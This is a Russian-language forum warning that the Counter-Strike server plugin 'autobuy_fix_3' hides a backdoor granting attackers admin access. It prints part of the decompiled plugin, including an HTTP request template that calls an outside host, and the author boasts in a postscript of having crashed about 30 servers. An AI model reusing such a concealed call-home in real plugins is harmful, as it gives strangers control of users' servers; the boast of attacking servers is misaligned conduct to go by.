BACKDOOR -БЭКДООР В ПЛАГИНЕ AUTOBUY_FIX_.AMXX - ПОЗВОЛЯЮЩИЙ ХАКЕРАМ ЗАВЛАДЕТЬ УПРАВЛЕНИЕМ НА ВАШЕМ СЕРВЕРЕ, ПРОПИСАТЬ АДМИНКУ ИЛИ УРОНИТЬ СЕРВЕР!
ВСЕМ СРОЧНО УДАЛИТЬ ДАННЫЙ ПЛАГИН!!
Иследования показали что плагин "AUTOBUY FIX 3" якобы защищающий от модифицированного эксплоита AUTOBUY BUG (AUTOBUY.TXT), сам является Новейшим эксплойтом!
Новость о выходе модифицированного экслоита AUTOBUY BUG 3 была обманом, дабы заставить установить многих пользователей обновленный плагин ..
Покапавшись
в инете, я нашел кучу плагинов которые якобы защищают Вас от новейшего
Бага AUTOBUY TXT --а на самом деле несут внутри себя вредоносный код,
позволяющий хакерам получить доступ к вашему игровому серверу
Недавно
столкнулся с добавлением в свой сервер PUBLIC левых админских учетных
записей.......Открывая users.ini заметил Незнакомую учетную запись
админа, с именем LOL, открыв Бан лист увидел забанеными около 15-25
человек, и все были забанены неизвестным админом..Которого я туда даже
не вписывал...Долго искал я Баг в сервере. Сначала подумал что
используется Флаг L и кто то из админов сам его туда вписал...А
оказалось все дело в плагине...В Котором был вредоносный код....
Иследуя данную проблемы сделал вывод о БЭКДОРЕ в плагинах сервера...
А именно выложенном в сети плагине Якобы закрывающем всем известную проблему с багом в autobuy.txt
Плагин autobuy_fix_3 При иследовании показал что в нем находится Бекдор позволяющий злоумышленникам завладеть вашим сервером!
Всем срочно удалить данный плагин с ваших серверов!!!!!! И установить нормальную версию плагина..
По Возможности проверьте свои плагины autobuy_FIX на наличие в них backdoor-ов
От этого экслоита (сплоита) нету защиты, не поможет dproto 0.8.72
P.S Вчера уронил около 30 серверовтока в Казнете.....У всех стоит левый плагин защиты от Новейшего Бага!!!! А наш работает!
ВОТ ЧАСТЬ ИХ ВРЕДОНОСНОГО ПЛАГИНА (Я ЕГО ДЕКОМПИЛИРОВАЛ).DATA
arr_000 array 1372 fill 0x0
str_000 string "Fix AutoBuy Bug"
str_001 string "1.1"
str_002 string "PomanoB & UFPS.Team"
str_003 string "cl_setautobuy"
str_004 string "cmd_check"
var_000 variable ( 0x0 )
str_005 string "cl_setrebuy"
str_006 string "cmd_check"
str_007 string "SV_ClientBuyFixFunc"
str_008 string "var_fix"
var_001 variable ( 0x0 )
str_009 string "www.36484.ru"
str_010 string "GET /bugfix.php?sign=%s HTTP/1.1
^nHost: 36484.ru
^n
^n"
str_011 string "autobuy_%Y%m.log"
arr_001 array 1118 fill 0x0
str_012 string "Autobuy bug use: %s [%s] <%s>"
Автор статьи DJ - на основе собственных иследований